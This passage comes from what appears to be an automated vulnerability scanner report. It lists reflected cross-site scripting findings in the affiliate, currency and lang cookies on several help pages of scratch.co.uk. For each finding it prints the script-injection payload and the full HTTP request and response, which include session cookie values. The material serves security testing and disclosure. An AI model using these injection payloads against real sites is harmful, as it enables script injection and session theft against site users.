<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content
...[SNIP]...
<a href="javascript:openScratch('GBP', 'ENG7cf9c"><script>alert(1)</script>10570ae66c1', 'direct-173|193|214|243');" onclick="pageTracker._trackEvent('Join', 'Top Nav');">
...[SNIP]...

3.160. http://scratch.co.uk/help/ [affiliate cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://scratch.co.uk
Path:   /help/

Issue detail

The value of the affiliate cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c9f4c"><script>alert(1)</script>eaf4b62400f was submitted in the affiliate cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /help/ HTTP/1.1
Host: scratch.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: affiliate=direct-173%7C193%7C214%7C243c9f4c"><script>alert(1)</script>eaf4b62400f; __utmz=170832034.1305546095.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=uoi3rve7v69eaglpo2h88ev7o6; neogamesemail=deleted; __utma=170832034.59486741.1305546095.1305546095.1305546095.1; __utmc=170832034; __utmb=170832034.1.10.1305546095; lang=ENG; currency=GBP;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:25:46 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Cache-control: private
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: affiliate=direct-173%7C193%7C214%7C243c9f4c%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3Eeaf4b62400f; expires=Wed, 15-Jun-2011 12:25:46 GMT; path=/
Set-Cookie: lang=ENG; expires=Wed, 15-Jun-2011 12:25:46 GMT; path=/
Set-Cookie: currency=GBP; expires=Wed, 15-Jun-2011 12:25:46 GMT; path=/
Set-Cookie: neogamesemail=deleted%7E%7E; expires=Tue, 17-May-2011 00:25:46 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 11402

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content
...[SNIP]...
<a href="javascript:openScratch('GBP', 'ENG', 'direct-173|193|214|243c9f4c"><script>alert(1)</script>eaf4b62400f');" onclick="pageTracker._trackEvent('Join', 'Top Nav');">
...[SNIP]...

3.161. http://scratch.co.uk/help/ [currency cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://scratch.co.uk
Path:   /help/

Issue detail

The value of the currency cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b813a"><script>alert(1)</script>e452f3eaa1a was submitted in the currency cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /help/ HTTP/1.1
Host: scratch.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: affiliate=direct-173%7C193%7C214%7C243; __utmz=170832034.1305546095.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=uoi3rve7v69eaglpo2h88ev7o6; neogamesemail=deleted; __utma=170832034.59486741.1305546095.1305546095.1305546095.1; __utmc=170832034; __utmb=170832034.1.10.1305546095; lang=ENG; currency=GBPb813a"><script>alert(1)</script>e452f3eaa1a;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:30:08 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Cache-control: private
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: affiliate=direct-173%7C193%7C214%7C243; expires=Wed, 15-Jun-2011 12:30:08 GMT; path=/
Set-Cookie: lang=ENG; expires=Wed, 15-Jun-2011 12:30:08 GMT; path=/
Set-Cookie: currency=GBPb813a%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3Ee452f3eaa1a; expires=Wed, 15-Jun-2011 12:30:08 GMT; path=/
Set-Cookie: neogamesemail=deleted%7E%7E; expires=Tue, 17-May-2011 00:30:08 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 11400

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content
...[SNIP]...
<a href="javascript:openScratch('GBPb813a"><script>alert(1)</script>e452f3eaa1a', 'ENG', 'direct-173|193|214|243');" onclick="pageTracker._trackEvent('Join', 'Top Nav');">
...[SNIP]...

3.162. http://scratch.co.uk/help/ [lang cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://scratch.co.uk
Path:   /help/

Issue detail

The value of the lang cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c1ac7"><script>alert(1)</script>f16dba27792 was submitted in the lang cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /help/ HTTP/1.1
Host: scratch.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: affiliate=direct-173%7C193%7C214%7C243; __utmz=170832034.1305546095.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=uoi3rve7v69eaglpo2h88ev7o6; neogamesemail=deleted; __utma=170832034.59486741.1305546095.1305546095.1305546095.1; __utmc=170832034; __utmb=170832034.1.10.1305546095; lang=ENGc1ac7"><script>alert(1)</script>f16dba27792; currency=GBP;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:29:23 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Cache-control: private
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: affiliate=direct-173%7C193%7C214%7C243; expires=Wed, 15-Jun-2011 12:29:23 GMT; path=/
Set-Cookie: lang=ENGc1ac7%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3Ef16dba27792; expires=Wed, 15-Jun-2011 12:29:23 GMT; path=/
Set-Cookie: currency=GBP; expires=Wed, 15-Jun-2011 12:29:23 GMT; path=/
Set-Cookie: neogamesemail=deleted%7E%7E; expires=Tue, 17-May-2011 00:29:23 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 11402

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content
...[SNIP]...
<a href="javascript:openScratch('GBP', 'ENGc1ac7"><script>alert(1)</script>f16dba27792', 'direct-173|193|214|243');" onclick="pageTracker._trackEvent('Join', 'Top Nav');">
...[SNIP]...

3.163. http://scratch.co.uk/help/deposit/methods/ [affiliate cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://scratch.co.uk
Path:   /help/deposit/methods/

Issue detail

The value of the affiliate cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4b792"><script>alert(1)</script>7be29cfe53a was submitted in the affiliate cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /help/deposit/methods/ HTTP/1.1
Host: scratch.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: affiliate=direct-173%7C193%7C214%7C2434b792"><script>alert(1)</script>7be29cfe53a; __utmz=170832034.1305546095.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=uoi3rve7v69eaglpo2h88ev7o6; neogamesemail=deleted; __utma=170832034.59486741.1305546095.1305546095.1305546095.1; __utmc=170832034; __utmb=170832034.1.10.1305546095; lang=ENG; currency=GBP;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:26:03 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Cache-control: private
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: affiliate=direct-173%7C193%7C214%7C2434b792%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E7be29cfe53a; expires=Wed, 15-Jun-2011 12:26:03 GMT; path=/
Set-Cookie: lang=ENG; expires=Wed, 15-Jun-2011 12:26:03 GMT; path=/
Set-Cookie: currency=GBP; expires=Wed, 15-Jun-2011 12:26:03 GMT; path=/
Set-Cookie: neogamesemail=deleted%7E%7E; expires=Tue, 17-May-2011 00:26:03 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 18431

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content
...[SNIP]...
<a href="javascript:openScratch('GBP', 'ENG', 'direct-173|193|214|2434b792"><script>alert(1)</script>7be29cfe53a');" onclick="pageTracker._trackEvent('Join', 'Top Nav');">
...[SNIP]...

3.164. http://scratch.co.uk/help/deposit/methods/ [currency cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://scratch.co.uk
Path:   /help/deposit/methods/

Issue detail

The value of the currency cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fb9ed"><script>alert(1)</script>e3eb6fdaf26 was submitted in the currency cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /help/deposit/methods/ HTTP/1.1
Host: scratch.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: affiliate=direct-173%7C193%7C214%7C243; __utmz=170832034.1305546095.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=uoi3rve7v69eaglpo2h88ev7o6; neogamesemail=deleted; __utma=170832034.59486741.1305546095.1305546095.1305546095.1; __utmc=170832034; __utmb=170832034.1.10.1305546095; lang=ENG; currency=GBPfb9ed"><script>alert(1)</script>e3eb6fdaf26;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:30:32 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Cache-control: private
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: affiliate=direct-173%7C193%7C214%7C243; expires=Wed, 15-Jun-2011 12:30:32 GMT; path=/
Set-Cookie: lang=ENG; expires=Wed, 15-Jun-2011 12:30:32 GMT; path=/
Set-Cookie: currency=GBPfb9ed%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3Ee3eb6fdaf26; expires=Wed, 15-Jun-2011 12:30:32 GMT; path=/
Set-Cookie: neogamesemail=deleted%7E%7E; expires=Tue, 17-May-2011 00:30:32 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 18429

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content
...[SNIP]...
<a href="javascript:openScratch('GBPfb9ed"><script>alert(1)</script>e3eb6fdaf26', 'ENG', 'direct-173|193|214|243');" onclick="pageTracker._trackEvent('Join', 'Top Nav');">
...[SNIP]...

3.165. http://scratch.co.uk/help/deposit/methods/ [lang cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://scratch.co.uk
Path:   /help/deposit/methods/

Issue detail

The value of the lang cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a2c6e"><script>alert(1)</script>f553ccebbf was submitted in the lang cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /help/deposit/methods/ HTTP/1.1
Host: scratch.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: affiliate=direct-173%7C193%7C214%7C243; __utmz=170832034.1305546095.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=uoi3rve7v69eaglpo2h88ev7o6; neogamesemail=deleted; __utma=170832034.59486741.1305546095.1305546095.1305546095.1; __utmc=170832034; __utmb=170832034.1.10.1305546095; lang=ENGa2c6e"><script>alert(1)</script>f553ccebbf; currency=GBP;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:30:07 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Cache-control: private
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: affiliate=direct-173%7C193%7C214%7C243; expires=Wed, 15-Jun-2011 12:30:08 GMT; path=/
Set-Cookie: lang=ENGa2c6e%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3Ef553ccebbf; expires=Wed, 15-Jun-2011 12:30:08 GMT; path=/
Set-Cookie: currency=GBP; expires=Wed, 15-Jun-2011 12:30:08 GMT; path=/
Set-Cookie: neogamesemail=deleted%7E%7E; expires=Tue, 17-May-2011 00:30:08 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 18534

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content
...[SNIP]...
<a href="javascript:openScratch('GBP', 'ENGa2c6e"><script>alert(1)</script>f553ccebbf', 'direct-173|193|214|243');" onclick="pageTracker._trackEvent('Join', 'Top Nav');">
...[SNIP]...

3.166. http://scratch.co.uk/help/fairplay/ [affiliate cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://scratch.co.uk
Path:   /help/fairplay/

Issue detail

The value of the affiliate cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c71b4"><script>alert(1)</script>7d02a9a5dda was submitted in the affiliate cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /help/fairplay/ HTTP/1.1
Host: scratch.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: affiliate=direct-173%7C193%7C214%7C243c71b4"><script>alert(1)</script>7d02a9a5dda; __utmz=170832034.1305546095.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=uoi3rve7v69eaglpo2h88ev7o6; neogamesemail=deleted; __utma=170832034.59486741.1305546095.1305546095.1305546095.1; __utmc=170832034; __utmb=170832034.1.10.1305546095; lang=ENG; currency=GBP;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:25:50 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Cache-control: private
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: affiliate=direct-173%7C193%7C214%7C243c71b4%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E7d02a9a5dda; expires=Wed, 15-Jun-2011 12:25:50 GMT; path=/
Set-Cookie: lang=ENG; expires=Wed, 15-Jun-2011 12:25:50 GMT; path=/
Set-Cookie: currency=GBP; expires=Wed, 15-Jun-2011 12:25:50 GMT; path=/
Set-Cookie: neogamesemail=deleted%7E%7E; expires=Tue, 17-May-2011 00:25:50 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 12387

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content
...[SNIP]...
<a href="javascript:openScratch('GBP', 'ENG', 'direct-173|193|214|243c71b4"><script>alert(1)</script>7d02a9a5dda');" onclick="pageTracker._trackEvent('Join', 'Top Nav');">
...[SNIP]...

3.167. http://scratch.co.uk/help/fairplay/ [currency cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://scratch.co.uk
Path:   /help/fairplay/

Issue detail

The value of the currency cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d8329"><script>alert(1)</script>563c2da48f5 was submitted in the currency cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /help/fairplay/ HTTP/1.1
Host: scratch.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: affiliate=direct-173%7C193%7C214%7C243; __utmz=170832034.1305546095.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=uoi3rve7v69eaglpo2h88ev7o6; neogamesemail=deleted; __utma=170832034.59486741.1305546095.1305546095.1305546095.1; __utmc=170832034; __utmb=170832034.1.10.1305546095; lang=ENG; currency=GBPd8329"><script>alert(1)</script>563c2da48f5;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:30:08 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Cache-control: private
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: affiliate=direct-173%7C193%7C214%7C243; expires=Wed, 15-Jun-2011 12:30:10 GMT; path=/
Set-Cookie: lang=ENG; expires=Wed, 15-Jun-2011 12:30:10 GMT; path=/
Set-Cookie: currency=GBPd8329%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E563c2da48f5; expires=Wed, 15-Jun-2011 12:30:10 GMT; path=/
Set-Cookie: neogamesemail=deleted%7E%7E; expires=Tue, 17-May-2011 00:30:10 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 12278

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content
...[SNIP]...
<a href="javascript:openScratch('GBPd8329"><script>alert(1)</script>563c2da48f5', 'ENG', 'direct-173|193|214|243');" onclick="pageTracker._trackEvent('Join', 'Top Nav');">
...[SNIP]...

3.168. http://scratch.co.uk/help/fairplay/ [lang cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://scratch.co.uk
Path:   /help/fairplay/

Issue detail

The value of the lang cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 29be1"><script>alert(1)</script>140ac1fb98e was submitted in the lang cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /help/fairplay/ HTTP/1.1
Host: scratch.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: affiliate=direct-173%7C193%7C214%7C243; __utmz=170832034.1305546095.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=uoi3rve7v69eaglpo2h88ev7o6; neogamesemail=deleted; __utma=170832034.59486741.1305546095.1305546095.1305546095.1; __utmc=170832034; __utmb=170832034.1.10.1305546095; lang=ENG29be1"><script>alert(1)</script>140ac1fb98e; currency=GBP;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:29:24 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Cache-control: private
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: affiliate=direct-173%7C193%7C214%7C243; expires=Wed, 15-Jun-2011 12:29:24 GMT; path=/
Set-Cookie: lang=ENG29be1%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E140ac1fb98e; expires=Wed, 15-Jun-2011 12:29:24 GMT; path=/
Set-Cookie: currency=GBP; expires=Wed, 15-Jun-2011 12:29:24 GMT; path=/
Set-Cookie: neogamesemail=deleted%7E%7E; expires=Tue, 17-May-2011 00:29:24 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 12387

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content
...[SNIP]...
<a href="javascript:openScratch('GBP', 'ENG29be1"><script>alert(1)</script>140ac1fb98e', 'direct-173|193|214|243');" onclick="pageTracker._trackEvent('Join', 'Top Nav');">
...[SNIP]...

3.169. http://scratch.co.uk/help/privacy/ [affiliate cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://scratch.co.uk
Path:   /help/privacy/

Issue detail

The value of the affiliate cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 34a13"><script>alert(1)</script>461aa39c4c8 was submitted in the affiliate cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /help/privacy/ HTTP/1.1
Host: scratch.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: affiliate=direct-173%7C193%7C214%7C24334a13"><script>alert(1)</script>461aa39c4c8; __utmz=170832034.1305546095.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=uoi3rve7v69eaglpo2h88ev7o6; neogamesemail=deleted; __utma=170832034.59486741.1305546095.1305546095.1305546095.1; __utmc=170832034; __utmb=170832034.1.10.1305546095; lang=ENG; currency=GBP;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:25:56 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Cache-control: private
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: affiliate=direct-173%7C193%7C214%7C24334a13%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E461aa39c4c8; expires=Wed, 15-Jun-2011 12:25:57 GMT; path=/
Set-Cookie: lang=ENG; expires=Wed, 15-Jun-2011 12:25:57 GMT; path=/
Set-Cookie: currency=GBP; expires=Wed, 15-Jun-2011 12:25:57 GMT; path=/
Set-Cookie: neogamesemail=deleted%7E%7E; expires=Tue, 17-May-2011 00:25:57 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 17257

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content
...[SNIP]...
<a href="javascript:openScratch('GBP', 'ENG', 'direct-173|193|214|24334a13"><script>alert(1)</script>461aa39c4c8');" onclick="pageTracker._trackEvent('Join', 'Top Nav');">
...[SNIP]...

3.170. http://scratch.co.uk/help/privacy/ [currency cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://scratch.co.uk
Path:   /help/privacy/

Issue detail

The value of the currency cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ff73f"><script>alert(1)</script>74d5790b1ac was submitted in the currency cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /help/privacy/ HTTP/1.1
Host: scratch.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: affiliate=direct-173%7C193%7C214%7C243; __utmz=170832034.1305546095.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=uoi3rve7v69eaglpo2h88ev7o6; neogamesemail=deleted; __utma=170832034.59486741.1305546095.1305546095.1305546095.1; __utmc=170832034; __utmb=170832034.1.10.1305546095; lang=ENG; currency=GBPff73f"><script>alert(1)</script>74d5790b1ac;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:30:34 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Cache-control: private
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: affiliate=direct-173%7C193%7C214%7C243; expires=Wed, 15-Jun-2011 12:30:35 GMT; path=/
Set-Cookie: lang=ENG; expires=Wed, 15-Jun-2011 12:30:35 GMT; path=/
Set-Cookie: currency=GBPff73f%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E74d5790b1ac; expires=Wed, 15-Jun-2011 12:30:35 GMT; path=/
Set-Cookie: neogamesemail=deleted%7E%7E; expires=Tue, 17-May-2011 00:30:35 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 17101

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content
...[SNIP]...
<a href="javascript:openScratch('GBPff73f"><script>alert(1)</script>74d5790b1ac', 'ENG', 'direct-173|193|214|243');" onclick="pageTracker._trackEvent('Join', 'Top Nav');">
...[SNIP]...

3.171. http://scratch.co.uk/help/privacy/ [lang cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://scratch.co.uk
Path:   /help/privacy/

Issue detail

